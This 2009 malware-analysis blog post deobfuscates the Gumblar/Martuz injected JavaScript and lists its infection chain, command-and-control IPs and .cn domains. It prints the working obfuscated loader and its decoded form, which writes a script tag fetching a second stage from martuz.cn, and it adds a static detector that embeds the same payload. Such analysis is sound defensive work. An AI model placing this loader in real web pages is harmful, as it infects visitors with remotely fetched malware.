
Deobfuscating Gumblar

by James Maniscalchi // 8 June 2009

What is it?

Gumblar is the latest in a series of large-scale malware outbreaks that began with Conficker in late 2008. It works in two halves: a server-side infection of legitimate websites, and a client-side infection of the people who visit them, each with an associated botnet.

Though the attack is circular, let's assume, for the sake of argument, that it begins with a victim browsing to an infected website. The site carries an injected JavaScript. This script downloads a further JavaScript from one of a series of servers under .cn domains (most of these are now blacklisted). That second script then loads malicious PDF and Flash files that exploit vulnerabilities in the corresponding viewer plugins to compromise the victim machine. Like Conficker, Gumblar relies on vulnerabilities for which patches already exist, so only users without fully patched systems are at risk. That's most of them, then...

Once the victim's client machine has been compromised, Gumblar alters the links on Google search results pages. According to Scansafe:

When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links are replacing the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click through.

The motivation for this activity, and presumably the worm in general, appears to be financial.

The client-side malware registers itself as an auxiliary sound driver and is thus loaded whenever a sound-enabled application is launched. It sits in the background sniffing for FTP credentials, which are then used to log in to web servers as their legitimate owners and infect further sites, closing the loop.

Scansafe conducted some additional analysis against the client side malware and found that:

The gumblar.cn compromise may also be accompanied by malicious iframes that load exploits and malware from domains hosted at 213.182.197.23, including liteautotop.cn, bigtruckstopseek.cn, autobestwestern.cn and several others. Both the 94.247.2.195 and 213.182.197.23 addresses are hosted in Latvia whereas the gumblar.cn domain has a Moscow IP that reverses to ukservers.com. Coincidentally, the malware loaded in the most recent round of attacks results in the installation of a backdoor that attempts to communicate with a botnet command & control located at 78.109.29.112 – a bot c&c with past ties to malware engaged in forcible redirects.

How Extensive is the Infection?
Google have been systematically delisting infected sites to help stem the epidemic. Their near-global view of the content of public websites allows them to collate infection statistics. The June '09 figures clearly show gumblar.cn and martuz.cn in the lead for the number of websites linking to them, at around 100,000 (chart not reproduced here).

In depth analysis
The analysis starts with the script injected into infected web pages, the part of the attack that targets visiting clients, which is URL-encoded JavaScript. The encoded sample is taken from Unmask Parasites and is actually an example of Martuz, an evolved and more sophisticated variant of Gumblar.

(function() {
var G33z1='%';
var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';
var m8nw=KlKj.replace(/-/g,G33z1);
eval(unescape(m8nw))
})();

When this code is placed on infected websites it is generated dynamically, so that pattern-based AV signatures do not match: each infestation of Gumblar can look different. The encoding used is URL escaping, in which each ASCII character is represented by a two-digit hex number preceded by a '%' sign. 'a', for example, escapes to its ASCII hex equivalent '%61'. These codes are normally used to escape special characters (space, ?, &) in values passed as GET parameters in a URL, and JavaScript's built-in unescape() function reverses the encoding, turning the escaped string back into plain text. For later reference, an ASCII code table belongs here (table not reproduced).

Gumblar further obfuscates itself by replacing the '%' character with a randomly chosen character that is not a hex digit, so the string no longer looks like URL encoding. In our example, '%' has been replaced with '-'.

The variable 'G33z1' (again randomly named) holds the '%' for later replacement. 'KlKj' is the encoded script. Note that only some of the characters are encoded: the substring 'd-6fcument-2ecookie' is clearly recognisable, with just '%6f' standing in for 'o' and '%2e' for '.'.

The ‘-’ marks are replaced with ‘%’ using a regular expression matcher:

var m8nw=KlKj.replace(/-/g,G33z1);

and finally the properly encoded string is decoded with unescape() and executed with an eval() call:

eval(unescape(m8nw))
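The same three steps can be reproduced offline, and without the eval(), which is how an analyst would want to handle a sample. The following is an added example, not code from the original post or from the malware: it locates loaders of this shape in a page by their structure (the randomised variable names and separator are recovered from the match rather than assumed), decodes the payload with a hand-written unescape, and pulls the second-stage hostname out of the decoded script even though the attacker splits it across two string literals. The HTML page it scans is constructed here and simply embeds the loader quoted above; the regular expression assumes the single-quoted, four-statement form seen in this sample.

```javascript
// Added example, not code from the original post: statically locate and decode
// the Gumblar/Martuz "replace, unescape, eval" loader without ever executing it.
// Variable names, the separator character and the payload are randomised per
// infection, so the matcher keys on the shape of the statements, not on names.

// Constructed sample page (assumption: the loader quoted in the article,
// dropped into an otherwise harmless HTML document).
const SAMPLE_PAGE = `<html><body><p>Welcome</p>
<script>(function() {
var G33z1='%';
var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';
var m8nw=KlKj.replace(/-/g,G33z1);
eval(unescape(m8nw))
})();</script>
</body></html>`;

// Shape of the loader:  var P='%'; var E='<payload>'; var D=E.replace(/<sep>/g,P); eval(unescape(D))
// Groups: 1 = percent var, 2 = payload var, 3 = payload, 4 = decoded var, 5 = separator (maybe regex-escaped).
const LOADER_RE = /var\s+(\w+)\s*=\s*['"]%['"]\s*;\s*var\s+(\w+)\s*=\s*['"]([^'"]*)['"]\s*;\s*var\s+(\w+)\s*=\s*\2\.replace\(\/(\\?.)\/g\s*,\s*\1\)\s*;\s*eval\(unescape\(\4\)\)/g;

// Same result as the legacy unescape() for the %XX forms Gumblar uses (no %uXXXX here).
function urlUnescape(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Folds "abc"+"def" into "abcdef" so a split hostname such as "martu"+"z.cn" reads whole.
function joinSplitStrings(js) {
  return js.replace(/"\s*\+\s*"/g, '');
}

// Hostnames referenced by src=//host/... or src=http(s)://host/... in the decoded stage.
function scriptHosts(js) {
  const hosts = [];
  const re = /src=(?:https?:)?\/\/([\w.-]+)/g;
  let m;
  while ((m = re.exec(joinSplitStrings(js))) !== null) hosts.push(m[1]);
  return hosts;
}

// Returns one record per loader found: the recovered names, the separator,
// the decoded script and the second-stage hosts it would call out to.
function findLoaders(html) {
  const found = [];
  LOADER_RE.lastIndex = 0;
  let m;
  while ((m = LOADER_RE.exec(html)) !== null) {
    const separator = m[5].slice(-1);                          // strip any regex escape
    const decoded = urlUnescape(m[3].split(separator).join('%')); // the replace() step, then unescape()
    found.push({ percentVar: m[1], payloadVar: m[2], separator, decoded, secondStageHosts: scriptHosts(decoded) });
  }
  return found;
}

for (const hit of findLoaders(SAMPLE_PAGE)) {
  console.log(`loader uses separator '${hit.separator}' via ${hit.percentVar}/${hit.payloadVar}, calls out to ${hit.secondStageHosts.join(', ')}`);
  console.log(hit.decoded);
}
```

Because the matcher is anchored on the statement shape and the backreferences (the same variable must be declared, substituted into and eval'd), a page full of legitimate URL-encoding code does not trigger it, while a fresh Gumblar variant with new names and a different separator still does.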

So, what does the decoded script look like, and more importantly, what does it do? The example we are working through is actually an evolved version of Gumblar, known as Martuz:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && ( u.indexOf("NT 6") < 0 ) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");
}

Although executable, the code is still somewhat obfuscated. First it checks that the browser is not Google Chrome, that the system is running Windows, that the Windows version is not NT 6.x (Vista and Server 2008), and that no cookie named 'miek' is set to 1. It also checks that the global variable 'zrvzts' is not a string. On a first run that variable does not exist, so typeof returns 'undefined' and the check passes; the very next line sets it to "A", so a second copy of the script on the same page skips itself. This is a guard against injecting the second stage twice.

If the preliminary checks pass, the script evaluates a further obfuscated string that tests for a ScriptEngine object. The string is assembled from fragments ("ScriptEngine", "Major", "Version()+") so that the tell-tale function names never appear literally in the page. ScriptEngineMajorVersion() and its siblings exist only in Internet Explorer's JScript engine, so on other browsers 'j' stays empty; on IE it becomes a concatenated major/minor/build fingerprint of the JScript engine, which is passed to the second stage as the 'id' parameter.

if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;

Lastly the code writes a script tag that downloads a further JavaScript from a .cn domain; the hostname is split into "martu"+"z.cn" to defeat naive string matching. The original Gumblar was named after its rendezvous domain, gumblar.cn. This example downloads its second stage from martuz.cn.

document.write("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");
